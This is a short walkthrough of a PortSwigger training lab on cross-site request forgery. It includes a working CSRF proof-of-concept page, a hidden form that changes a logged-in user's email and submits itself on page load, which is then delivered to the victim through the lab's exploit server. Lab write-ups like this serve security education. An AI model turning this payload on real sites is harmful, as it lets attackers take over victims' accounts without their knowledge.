Burp Suite lab: CSRF with no defenses

Published 2023-10-13 09:21:34, author: BattleofZhongDinghe


Lab URL

https://portswigger.net/web-security/csrf/lab-no-defenses

Walkthrough

1. Log in.

2. Change the email address and capture the request in Burp.

3. Generate the CSRF PoC (Burp's "Generate CSRF PoC" produces the following page):

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

It needs a small fix: the generated page only has a submit button, so add an auto-submit script (<script>document.forms[0].submit();</script>) at the end of the body so the form is posted as soon as the page loads:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8d005f0443d44d83824cd500020014.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
  <script>document.forms[0].submit();</script>
  </body>
</html>

4. Click the exploit server link at the top of the lab, paste the page into the body, store it, and deliver the payload to the victim.